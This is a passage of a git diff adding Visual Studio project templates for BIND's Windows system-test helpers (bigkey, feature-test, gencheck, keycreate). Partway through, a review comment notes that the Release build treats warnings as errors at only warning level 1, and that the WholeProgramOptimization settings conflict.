<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + 
<SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + 
<EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\rsabigexponent\bigkey.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/bigkey.vcxproj.user b/bin/tests/system/win32/bigkey.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/bigkey.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/feature-test.vcxproj.filters.in b/bin/tests/system/win32/feature-test.vcxproj.filters.in new file mode 100644 index 0000000..0e4fe58 --- /dev/null +++ b/bin/tests/system/win32/feature-test.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\feature-test.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/feature-test.vcxproj.in b/bin/tests/system/win32/feature-test.vcxproj.in
new file mode 100644
index 0000000..92311c9
--- /dev/null
+++ b/bin/tests/system/win32/feature-test.vcxproj.in
@@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{63A921F6-1200-4723-828A-98960127B73D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>feature-test</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> 
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + 
<SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + 
<OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\feature-test.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/feature-test.vcxproj.user b/bin/tests/system/win32/feature-test.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/feature-test.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/gencheck.vcxproj.filters.in b/bin/tests/system/win32/gencheck.vcxproj.filters.in new file mode 100644 index 0000000..33431cf --- /dev/null +++ b/bin/tests/system/win32/gencheck.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\rndc\gencheck.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/gencheck.vcxproj.in b/bin/tests/system/win32/gencheck.vcxproj.in
new file mode 100644
index 0000000..12b51d1
--- /dev/null
+++ b/bin/tests/system/win32/gencheck.vcxproj.in
@@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{764DBE24-C8B3-46E8-BE73-196431353A5D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>gencheck</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + 
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + 
<GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + 
<OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\rndc\gencheck.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/gencheck.vcxproj.user b/bin/tests/system/win32/gencheck.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/gencheck.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
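Review bot: In the Release `ClCompile` block, `<TreatWarningAsError>true</TreatWarningAsError>` is paired with `<WarningLevel>Level1</WarningLevel>`, while the Debug block uses `Level4` with warnings non-fatal, so the one configuration that fails the build on a warning is also the one that reports the fewest. Diagnostics that MSVC issues above level 1, such as signed/unsigned comparison and size-truncation warnings, therefore never gate the build of this helper. I would raise the Release level, e.g. `<WarningLevel>Level3</WarningLevel>`, or make the Debug warnings fatal as well, and add a short XML comment explaining the chosen pair. The same settings appear in the keycreate, keydelete and pipequeries project templates later in this diff; the Release `<WholeProgramOptimization>` value also disagrees between the Configuration property group (`true`) and `ClCompile` (`false`), which looks unintended.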
\ No newline at end of file
diff --git a/bin/tests/system/win32/keycreate.vcxproj.filters.in b/bin/tests/system/win32/keycreate.vcxproj.filters.in
new file mode 100644
index 0000000..09f4c3a
--- /dev/null
+++ b/bin/tests/system/win32/keycreate.vcxproj.filters.in
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="..\tkey\keycreate.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/keycreate.vcxproj.in b/bin/tests/system/win32/keycreate.vcxproj.in
new file mode 100644
index 0000000..e4313e9
--- /dev/null
+++ b/bin/tests/system/win32/keycreate.vcxproj.in
@@ -0,0 +1,119 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|@PLATFORM@">
+ <Configuration>Debug</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|@PLATFORM@">
+ <Configuration>Release</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <ProjectGuid>{4F9A0F6F-366D-4483-B131-793832840508}</ProjectGuid>
+ <Keyword>Win32Proj</Keyword>
+ <RootNamespace>keycreate</RootNamespace>
+ @WINDOWS_TARGET_PLATFORM_VERSION@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <LinkIncremental>true</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <LinkIncremental>false</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <ClCompile>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <WarningLevel>Level4</WarningLevel>
+ <TreatWarningAsError>false</TreatWarningAsError>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
